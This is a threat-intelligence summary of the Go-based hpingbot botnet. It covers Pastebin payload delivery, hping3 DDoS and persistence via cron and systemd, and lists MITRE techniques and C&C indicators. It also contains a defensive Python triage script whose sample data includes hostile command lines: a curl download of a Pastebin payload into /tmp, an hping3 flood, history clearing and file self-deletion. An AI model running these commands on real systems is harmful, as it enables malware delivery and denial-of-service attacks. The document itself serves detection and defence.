Hpingbot Distributing Malware Via Pastebin


A new cross-platform botnet family named hpingbot, written in Go, is spreading rapidly and evolving. It launches DDoS attacks with the network testing tool hping3 and distributes arbitrary payloads via Pastebin. The botnet shows considerable innovation, with an independent propagation module, multiple persistence mechanisms, and frequent updates; it poses a significant threat as a potential long-term malware operation that could be used to distribute more advanced threats such as ransomware or APT components.

Key points

  • Hpingbot is a newly discovered botnet family developed in Go, supporting Windows and Linux/IoT with multi-architecture versions (amd64, mips, arm, 80386).
  • The botnet leverages the online text-sharing platform Pastebin for flexible payload distribution and uses the network testing tool hping3 to launch various types of DDoS attacks.
  • Hpingbot’s Windows version cannot directly use hping3 but remains highly active, suggesting a focus on downloading and executing arbitrary payloads beyond DDoS.
  • It employs independent SSH propagation modules, multiple persistence methods (Systemd, SysVinit, Cron), and trace cleaning to avoid detection.
  • The attacker frequently updates C&C servers and Trojan versions, indicating a professional development effort and potential for long-term operation.
  • Hpingbot has been used to perform DDoS attacks primarily targeting Germany, the US, and Turkey, with a focus on stealth and reduced operational cost.
  • New DDoS components distributed through hpingbot show ongoing attacker testing and potential replacement or supplementation of original botnet capabilities.

MITRE Techniques

  • [T1059.004] Command and Scripting Interpreter: Unix Shell – Used to execute attack tools and system architecture detection via Shell scripts (‘Execute attack tool deployment and system architecture detection through Shell scripts’).
  • [T1569.002] System Services: Service Execution – Utilized in managing system services for persistence (‘Combine system services (Systemd/SysVinit) with scheduled tasks (Cron) to achieve a persistence mechanism’).
  • [T1543.002] Create or Modify System Process: Systemd Service – Used to create service unit files for botnet persistence (‘Create a service unit file, set the boot self-start and start the service’).
  • [T1037.004] Boot or Logon Initialization Scripts: RC Scripts – Implemented for persistence (‘Create an init script and enable autostart with update-rc.d or chkconfig’).
  • [T1053.003] Scheduled Task/Job: Cron – Cron jobs set to run on restart to maintain persistence (‘Set to run on restart via the @reboot rule’).
  • [T1070.004] Indicator Removal: File Deletion – File self-deletion after execution to avoid detection (‘Perform file self-deletion after execution to avoid detection’).
  • [T1070.003] Indicator Removal: Clear Command History – Clearing command history to evade tracking (‘Clear command history’).
  • [T1102.002] Web Service: Pastebin – Pastebin is used to host malicious payloads for flexible distribution (‘Use Pastebin platform to host malicious payloads’).
  • [T1095] Non-Application Layer Protocol – hping3 used to launch DDoS attacks at the network layer (‘Deploy hping3 to launch DDoS attacks’).
  • [T1008] Fallback Channels – Use of multiple C&C servers and update commands for resilience (‘Frequent replacement of C&C servers’).
  • [T1498] Network Denial of Service – Launching various DDoS attack types using hping3 with custom parameters (‘DDoS attack instructions executed by calling hping3 with specified parameters’).
  • [T1082] System Information Discovery – Detecting system architecture for adaptive payload deployment (‘Architecture identification to generate corresponding file names’).
  • [T1588.001] Acquire Tool: Software – Installation of hping3 via package managers for attack purposes (‘Hpingbot downloads and installs hping3 by executing the command apt -y install hping3’).
  • [T1588.006] Acquire Infrastructure: Web Services – Use of Pastebin and controlled nodes for infrastructure supporting payload delivery (‘Uses Pastebin and controlled nodes to distribute other components’).
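The persistence and tooling behaviours in the list above (the @reboot cron rule, the systemd service unit, the hping3 installation and flood invocations, command-history clearing and file self-deletion) leave artifacts that a defender can triage from a host. The Python script below is an added example written for this summary, not code from NSFOCUS or from the report; the crontab, unit file and shell command lines it inspects are constructed samples, and the Pastebin URL in them is a placeholder.

```python
"""Host-side triage for the hpingbot-style persistence and tooling behaviours."""
import re

# Scratch directories that a legitimate service or @reboot job rarely runs from.
SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Constructed sample artifacts (not taken from the report).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/backup.sh
@reboot /tmp/.x/update >/dev/null 2>&1
"""

SAMPLE_UNIT = """\
[Unit]
Description=system update helper
[Service]
ExecStart=/tmp/.x/update
Restart=always
[Install]
WantedBy=multi-user.target
"""

SAMPLE_SHELL_LOG = [
    "apt -y install hping3",
    "curl -s https://pastebin.com/raw/PLACEHOLDER -o /tmp/.x/update",
    "hping3 -S --flood -p 80 203.0.113.10",
    "history -c",
    "rm -f /tmp/.x/update",
    "ls -la /var/log",
]


def runs_from_writable_dir(command: str) -> bool:
    """True if the executable (first token) of a command lives in a scratch dir."""
    tokens = command.strip().split()
    return bool(tokens) and tokens[0].startswith(SUSPICIOUS_DIRS)


def find_reboot_cron(crontab_text: str) -> list[str]:
    """Return @reboot entries whose command runs from a scratch directory."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if line.startswith("@reboot"):
            cmd = line[len("@reboot"):].strip()
            if runs_from_writable_dir(cmd):
                hits.append(cmd)
    return hits


def audit_systemd_unit(unit_text: str) -> list[str]:
    """Return ExecStart commands in a unit file that point at a scratch directory."""
    findings = []
    for line in unit_text.splitlines():
        if line.startswith("ExecStart="):
            cmd = line.split("=", 1)[1]
            if runs_from_writable_dir(cmd):
                findings.append(cmd)
    return findings


# Each rule maps a behaviour from the technique list to a command-line pattern.
COMMAND_RULES = [
    ("tool-acquisition", re.compile(r"\b(apt|apt-get|yum|dnf)\b.*\binstall\b.*\bhping3\b")),
    ("pastebin-fetch", re.compile(r"\b(curl|wget)\b.*pastebin\.com")),
    ("hping3-flood", re.compile(r"\bhping3\b.*--flood")),
    ("history-clear", re.compile(r"\bhistory\s+-c\b|HISTFILE=/dev/null")),
    ("self-delete", re.compile(r"\brm\b.*(/tmp/|/var/tmp/|/dev/shm/)")),
]


def classify_commands(lines: list[str]) -> list[tuple[str, str]]:
    """Tag each command line with the first matching behaviour, skipping benign lines."""
    tagged = []
    for line in lines:
        for tag, pattern in COMMAND_RULES:
            if pattern.search(line):
                tagged.append((tag, line))
                break
    return tagged


def triage(crontab_text: str, unit_text: str, shell_lines: list[str]) -> dict:
    """Combine the three checks into one finding summary for an analyst."""
    tagged = classify_commands(shell_lines)
    return {
        "reboot_cron": find_reboot_cron(crontab_text),
        "unit_execstart": audit_systemd_unit(unit_text),
        "command_tags": sorted({tag for tag, _ in tagged}),
        "finding_count": len(tagged),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_CRONTAB, SAMPLE_UNIT, SAMPLE_SHELL_LOG).items():
        print(f"{key}: {value}")
```

The rules key on the combination of a scratch-directory executable with boot-time persistence and on the hping3 install and flood command shapes, which is more robust than matching a single hash; on a real host the inputs would come from `crontab -l`, `/etc/systemd/system/*.service` and audit or shell-history logs rather than the embedded samples.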

Indicators of Compromise

  • [IP Addresses] Attack targets and C&C infrastructure – 45.139.113.61, 193.32.162.210
  • [Domains/URLs] Payload hosting and distribution – http://128.0.118.18, http://93.123.118.21, http://94.156.181.41
  • [File Hashes] Sample malware identification – F33E6976E3692CB3E56A4CC9257F5AAE
  • [IP Addresses] Victim of multiple DDoS attacks used for testing – 79.*.*.212 (partial)


Read more: https://nsfocusglobal.com/hpingbot-a-new-botnet-family-based-on-pastebin-payload-delivery-chain-and-hping3-ddos-module/